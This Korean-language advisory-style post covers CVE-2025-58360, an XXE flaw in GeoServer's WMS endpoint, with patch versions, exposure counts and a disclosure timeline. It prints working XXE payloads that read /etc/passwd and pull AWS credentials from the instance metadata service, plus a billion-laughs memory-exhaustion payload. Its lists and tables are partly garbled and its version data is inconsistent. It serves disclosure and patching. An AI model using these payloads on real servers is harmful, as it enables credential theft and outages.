
CVE-2025-58360

AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L이것은 웹 맵 서비스(WMS) GetMap 엔드포인트의 고전적이지만 치명적인 XXE입니다.
공격자는 다음을 수행할 수 있습니다:
/etc/passwd, geoserver.xml, 개인 키 등)→ 현재 인터넷에 노출된 잠재적으로 취약한 서버가 수만 대입니다! 🌐
엔드포인트: POST /geoserver/wms
핵심 매개변수: SLD_BODY (원시 XML 스타일링 허용)
취약한 코드 경로: XML 파서가 외부 엔터티 해석을 비활성화하지 않음 → 고전적인 XXE.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<sld:StyledLayerDescriptor xmlns:sld="http://www.opengis.net/sld" version="1.0.0">
<sld:UserLayer>
<sld:LayerFeatureConstraints>
<sld:FeatureTypeConstraint>&xxe;</sld:FeatureTypeConstraint>
</sld:LayerFeatureConstraints>
</sld:UserLayer>
</sld:StyledLayerDescriptor>
→ 응답에 /etc/passwd의 내용이 포함됨 🎉
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
→ EC2에서 실행 중인 경우 임시 AWS 자격 증명 유출.
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!-- repeat up to lol9 -->
]>
<lol>&lol9;</lol>
→ 수 초 안에 수 기가바이트의 RAM 소모 💥
| 버전 | 출시일 | 다운로드 링크 |
|---|---|---|
| 2.27.0 | 2025년 11월 25일 | https://geoserver.org/release/stable/ |
| 2.26.3 | 2025년 11월 25일 |
Docker 사용자:
docker pull osgeo/geoserver:2.27.0
<!ENTITY 또는 SYSTEM "file://를 포함하는 요청 거부| 날짜 | 이벤트 |
|---|---|
| 2025년 11월 이전 | XBOW AI 스캐너에 의해 자동 발견 |
| 2025년 11월 25일 | 조정된 공개 → 패치 릴리스 |
| 2025년 11월 25일 | CVE 할당 및 게시 |
| 2025년 11월 26일 | PoCs 확산, 노출 스캔 급증 |
이것은 수만 개의 인터넷 연결 인스턴스가 있는 널리 배포된 지리공간 플랫폼을 공격하는 교과서적인 XXE입니다.
공개 당일 패치가 릴리스되었습니다 — 속도에 대한 GeoServer 팀에게 큰 찬사를 보냅니다! 🏆
그러나 패치 가용성과 대규모 악용 사이의 시간이 빠르게 줄어들고 있습니다.
GeoServer를 실행 중이라면 → 오늘 업그레이드하세요.
다음 헤드라인이 되지 마세요.
안전하고 빛나세요! 🛡️✨
| 구성 요소 | 취약한 버전 | 수정된 버전 | 상태 |
|---|
| GeoServer Standalone | 2.26.0 – 2.26.1 ≤ 2.25.5 | 2.26.3, 2.25.6, 2.27.0 | 🔴 취약함 |
| Docker (osgeo/geoserver) | 2.26.0 – 2.26.1 ≤ 2.25.5 | 2.26.2+, 2.27.0 | 🔴 취약함 |
| Maven org.geoserver:gs-wms | 2.26.0 – 2.26.1 ≤ 2.25.5 | 2.26.2+, 2.25.6 | 🔴 취약함 |
| Maven org.geoserver.web:gs-web-app | 2.26.0 – 2.26.1 ≤ 2.25.5 | 2.26.2+, 2.25.6 | 🔴 취약함 |
| GeoServer 2.27.x 및 신규 | – | 이미 패치됨 | ✅ 안전 |
| 출처 | 노출된 인스턴스 | 비고 |
|---|
| ZoomEye | ~49,400 | app:"GeoServer" 검색 |
| FOFA | ~24,000 | 지난 1년간 결과 |
| Shodan | ~31,000 | 포트 8080 + 제목 일치 |
| GobySec | ~20,000 | 공용 네트워크 스캔 |
| 유지보수 브랜치 패치 |
| 2.25.6 | 2025년 11월 25일 | 이전 지원 브랜치 |